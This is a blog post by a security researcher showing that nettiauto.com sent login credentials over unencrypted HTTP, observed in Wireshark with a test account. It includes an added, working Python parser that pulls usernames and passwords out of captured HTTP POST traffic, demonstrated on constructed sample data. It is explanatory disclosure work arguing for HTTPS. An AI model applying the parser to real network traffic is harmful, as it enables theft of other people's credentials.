A regular Wednesday morning starts, but with a small inspiration from yesterday evening. Being a car enthusiast, the best place to check out the prices and sale status of cars is probably the www.nettiauto.com page. After checking it out for a while I noticed this interesting “Login” button, and simultaneously noticed that we were not using HTTPS. Well, of course one needs to know what could be possible?
In general, using HTTP to transmit usernames and plain-text passwords from the browser to the web server is bad, bad design. One can argue that someone actually has to listen to the traffic, and that takes some effort. It does, to a degree. But man-in-the-middle attacks are easy to carry out nowadays if the attacker is simply on the same network as the victim, and a passive sniffer anywhere on the path sees the credentials exactly as the browser sent them, with no need to tamper with anything.
At this point I would like to point out that this experiment was conducted on my personal machine, affecting only me.
Back to Nettiauto. After a little time and effort, Wireshark displayed a very tempting HTTP POST message to /login.php. Please see the clip of a screenshot below.
If you did not guess yet, I used “testiuser” as the username and “researcherpassword” as the password. The impact of getting a user ID stolen in this case is quite minimal, but very unfortunate nevertheless. Since we all use different passwords for all our services, we don't have to worry if one web page leaks our password, right?
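As an added example (not code from the original post), here is roughly what the passive observer in the paragraphs above ends up doing with the bytes: a small Python parser that takes reassembled TCP payloads, picks out HTTP/1.x POST requests and their form-encoded bodies, and pulls out the fields that look like credentials. The captured payload below is constructed from the details in the post (a POST to /login.php on www.nettiauto.com with the test credentials); the form field names `username` and `password`, the credential keyword list and the TLS record standing in for the HTTPS case are assumptions, not anything observed on the site. As a contrast not in the original text, it also shows that the same login over HTTPS gives this parser nothing to work with.

```python
import urllib.parse
from typing import Optional

# Field names that commonly carry credentials in login forms. The real form's
# field names are not given in the post; this list is an assumption.
CREDENTIAL_KEYWORDS = ("user", "login", "email", "pass", "pwd")


def parse_http_request(segment: bytes) -> Optional[dict]:
    """Parse one reassembled TCP payload as an HTTP/1.x request.

    Returns None for anything that is not a complete HTTP request, for
    example a TLS record, where the bytes are ciphertext and nothing below
    applies. Only the request line, headers and a Content-Length-delimited
    body are handled, which is all a classic form login needs.
    """
    head, sep, rest = segment.partition(b"\r\n\r\n")
    if not sep:
        return None
    request_line, *header_lines = head.split(b"\r\n")
    parts = request_line.split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/1."):
        return None
    method, path, _version = (p.decode("latin-1") for p in parts)
    headers = {}
    for line in header_lines:
        name, colon, value = line.partition(b":")
        if not colon:
            return None
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    length = int(headers.get("content-length", "0"))
    body = rest[:length]
    if len(body) < length:
        return None  # body continues in a later segment; wait for more data
    return {"method": method, "path": path, "headers": headers, "body": body}


def extract_form_credentials(request: dict) -> dict:
    """Pull likely credential fields out of a form-encoded POST body."""
    ctype = request["headers"].get("content-type", "")
    if request["method"] != "POST" or not ctype.startswith("application/x-www-form-urlencoded"):
        return {}
    fields = urllib.parse.parse_qs(request["body"].decode("latin-1"), keep_blank_values=True)
    return {
        name: values[0]
        for name, values in fields.items()
        if any(keyword in name.lower() for keyword in CREDENTIAL_KEYWORDS)
    }


def sniff_credentials(segments) -> list:
    """Run both steps over a sequence of captured payloads, as a tap would."""
    found = []
    for segment in segments:
        request = parse_http_request(segment)
        if request is None:
            continue
        creds = extract_form_credentials(request)
        if creds:
            found.append({"host": request["headers"].get("host", "?"),
                          "path": request["path"], "credentials": creds})
    return found


# Constructed sample traffic (not a real capture). Field names are assumed.
_BODY = b"username=testiuser&password=researcherpassword"
SAMPLE_HTTP_LOGIN = (
    b"POST /login.php HTTP/1.1\r\n"
    b"Host: www.nettiauto.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: " + str(len(_BODY)).encode() + b"\r\n\r\n" + _BODY
)
# Constructed: the first bytes of a TLS handshake record, which is what the
# same login looks like on the wire over HTTPS. The sniffer gets nothing.
SAMPLE_TLS_RECORD = b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03" + b"\x00" * 32
SAMPLE_GET = b"GET / HTTP/1.1\r\nHost: www.nettiauto.com\r\n\r\n"

if __name__ == "__main__":
    for hit in sniff_credentials([SAMPLE_GET, SAMPLE_TLS_RECORD, SAMPLE_HTTP_LOGIN]):
        print(f"{hit['host']}{hit['path']}: {hit['credentials']}")
```

The parser deliberately refuses a request whose body has not fully arrived instead of guessing, which is the case a real tap hits constantly when a login body is split across TCP segments; a production sniffer would buffer per flow and retry.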
Text by an anonymous information security researcher